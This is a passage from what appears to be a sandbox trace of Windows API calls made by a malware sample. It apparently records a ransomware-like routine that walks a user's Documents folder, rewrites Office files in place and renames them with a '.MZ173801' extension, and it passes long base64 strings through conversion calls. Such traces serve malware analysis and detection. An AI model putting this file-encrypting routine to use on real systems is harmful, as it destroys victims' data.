lpNewFileName="C:\\Users\\FD1HVy\\Documents\\vyqzJRG.pptx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\vyqzjrg.pptx.mz173801")) returned 1 [0121.903] GetCurrentThreadId () returned 0x1358 [0121.903] GetCurrentThreadId () returned 0x1358 [0121.903] GetCurrentThreadId () returned 0x1358 [0121.903] GetCurrentThreadId () returned 0x1358 [0121.903] GetCurrentThreadId () returned 0x1358 [0121.903] GetCurrentThreadId () returned 0x1358 [0121.903] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ab4b60, ftCreationTime.dwHighDateTime=0x1d5dda0, ftLastAccessTime.dwLowDateTime=0xc69ee1a0, ftLastAccessTime.dwHighDateTime=0x1d5ef24, ftLastWriteTime.dwLowDateTime=0xc69ee1a0, ftLastWriteTime.dwHighDateTime=0x1d5ef24, nFileSizeHigh=0x0, nFileSizeLow=0x533b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zypeBTOwi7wsX-d.xlsx", cAlternateFileName="ZYPEBT~1.XLS")) returned 1 [0121.903] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.903] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.903] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\zypeBTOwi7wsX-d.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\zypebtowi7wsx-d.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ab4b60, ftCreationTime.dwHighDateTime=0x1d5dda0, ftLastAccessTime.dwLowDateTime=0xc69ee1a0, ftLastAccessTime.dwHighDateTime=0x1d5ef24, ftLastWriteTime.dwLowDateTime=0xc69ee1a0, ftLastWriteTime.dwHighDateTime=0x1d5ef24, nFileSizeHigh=0x0, nFileSizeLow=0x533b)) returned 1 [0121.904] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.904] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.904] GetCurrentThreadId () returned 0x1358 [0121.904] GetCurrentThreadId () returned 0x1358 [0121.904] GetCurrentThreadId () returned 0x1358 [0121.904] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.904] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.905] GetCurrentThreadId () returned 0x1358 [0121.905] GetCurrentThreadId () returned 0x1358 [0121.905] GetCurrentThreadId () returned 0x1358 [0121.905] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\zypeBTOwi7wsX-d.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\zypebtowi7wsx-d.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.905] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.905] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.905] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x533b [0121.905] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.905] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x533b, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x533b, lpOverlapped=0x0) returned 1 [0121.906] CloseHandle (hObject=0x3fc) returned 1 [0121.907] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\zypeBTOwi7wsX-d.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\zypebtowi7wsx-d.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.908] WriteFile (in: hFile=0x3fc, lpBuffer=0x2437b60*, nNumberOfBytesToWrite=0x533b, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2437b60*, lpNumberOfBytesWritten=0x19f9bc*=0x533b, lpOverlapped=0x0) returned 1 [0121.909] CloseHandle (hObject=0x3fc) returned 1 [0121.910] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\zypeBTOwi7wsX-d.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\zypebtowi7wsx-d.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\zypeBTOwi7wsX-d.xlsx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\zypebtowi7wsx-d.xlsx.mz173801")) returned 1 [0121.911] GetCurrentThreadId () returned 0x1358 [0121.911] GetCurrentThreadId () returned 0x1358 [0121.911] GetCurrentThreadId () returned 0x1358 [0121.911] GetCurrentThreadId () returned 0x1358 [0121.911] GetCurrentThreadId () returned 0x1358 [0121.911] GetCurrentThreadId () returned 0x1358 [0121.911] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ab4b60, ftCreationTime.dwHighDateTime=0x1d5dda0, ftLastAccessTime.dwLowDateTime=0xc69ee1a0, ftLastAccessTime.dwHighDateTime=0x1d5ef24, ftLastWriteTime.dwLowDateTime=0xc69ee1a0, ftLastWriteTime.dwHighDateTime=0x1d5ef24, nFileSizeHigh=0x0, nFileSizeLow=0x533b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zypeBTOwi7wsX-d.xlsx", cAlternateFileName="ZYPEBT~1.XLS")) returned 0 [0121.911] GetLastError () returned 0x12 [0121.911] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0121.911] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa9ef769e, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa9ef769e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0121.911] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0121.911] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.911] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa9ef769e, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa9ef769e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0121.911] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.911] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.911] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe19c1a30, ftCreationTime.dwHighDateTime=0x1d58148, ftLastAccessTime.dwLowDateTime=0x6eed11c0, ftLastAccessTime.dwHighDateTime=0x1d586c4, ftLastWriteTime.dwLowDateTime=0xa97b991c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x17950, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="14yXf75kP-7umnG 4Xe.xlsx.MZ173801", cAlternateFileName="14YXF7~1.MZ1")) returned 1 [0121.911] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.911] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.911] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x411301d0, ftCreationTime.dwHighDateTime=0x1d58d5c, ftLastAccessTime.dwLowDateTime=0xba362ef0, ftLastAccessTime.dwHighDateTime=0x1d5e8b7, ftLastWriteTime.dwLowDateTime=0xa97dfbde, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x18e0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1wztFJUX4Pd41Ftwf.xlsx.MZ173801", cAlternateFileName="1WZTFJ~1.MZ1")) returned 1 [0121.911] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.911] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.911] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffc180b0, ftCreationTime.dwHighDateTime=0x1d5bbd4, ftLastAccessTime.dwLowDateTime=0x174d0080, ftLastAccessTime.dwHighDateTime=0x1d5c439, ftLastWriteTime.dwLowDateTime=0xa9805d68, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xa228, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="28RvPNiENM.xlsx.MZ173801", cAlternateFileName="28RVPN~1.MZ1")) returned 1 [0121.911] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.911] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.911] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf347120, ftCreationTime.dwHighDateTime=0x1d57815, ftLastAccessTime.dwLowDateTime=0x2f896430, ftLastAccessTime.dwHighDateTime=0x1d59870, ftLastWriteTime.dwLowDateTime=0xa98a22f6, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xbc06, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DBo0atmEpeC-LN5J.pptx.MZ173801", cAlternateFileName="4DBO0A~1.MZ1")) returned 1 [0121.912] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.912] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.912] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x618d36c0, ftCreationTime.dwHighDateTime=0x1d5e9b3, ftLastAccessTime.dwLowDateTime=0x7d24e070, ftLastAccessTime.dwHighDateTime=0x1d5e618, ftLastWriteTime.dwLowDateTime=0xa98efc6d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x9515, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a TQSWLwdnXwLBG6xlM.pps.MZ173801", cAlternateFileName="ATQSWL~1.MZ1")) returned 1 [0121.912] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.912] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.912] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x735d4ec0, ftCreationTime.dwHighDateTime=0x1d5a7e2, ftLastAccessTime.dwLowDateTime=0xdc7b03e0, ftLastAccessTime.dwHighDateTime=0x1d5722a, ftLastWriteTime.dwLowDateTime=0xa98efc6d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x278f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bJ9_Ah.pptx.MZ173801", cAlternateFileName="BJ9_AH~1.MZ1")) returned 1 [0121.912] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.912] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.912] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xa9b63e1b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Database1.accdb.MZ173801", cAlternateFileName="DATABA~1.MZ1")) returned 1 [0121.912] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.912] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.912] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0121.912] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fc4990, ftCreationTime.dwHighDateTime=0x1d5f126, ftLastAccessTime.dwLowDateTime=0xf3bc9010, ftLastAccessTime.dwHighDateTime=0x1d5e452, ftLastWriteTime.dwLowDateTime=0xf3bc9010, ftLastWriteTime.dwHighDateTime=0x1d5e452, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fhb23ambk-o", cAlternateFileName="FHB23A~1")) returned 1 [0121.912] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.912] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.912] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fc4990, ftCreationTime.dwHighDateTime=0x1d5f126, ftLastAccessTime.dwLowDateTime=0xf3bc9010, ftLastAccessTime.dwHighDateTime=0x1d5e452, ftLastWriteTime.dwLowDateTime=0xf3bc9010, ftLastWriteTime.dwHighDateTime=0x1d5e452, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bb28 [0121.912] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fc4990, ftCreationTime.dwHighDateTime=0x1d5f126, ftLastAccessTime.dwLowDateTime=0xf3bc9010, ftLastAccessTime.dwHighDateTime=0x1d5e452, ftLastWriteTime.dwLowDateTime=0xf3bc9010, ftLastWriteTime.dwHighDateTime=0x1d5e452, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0121.912] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x392c0e0, 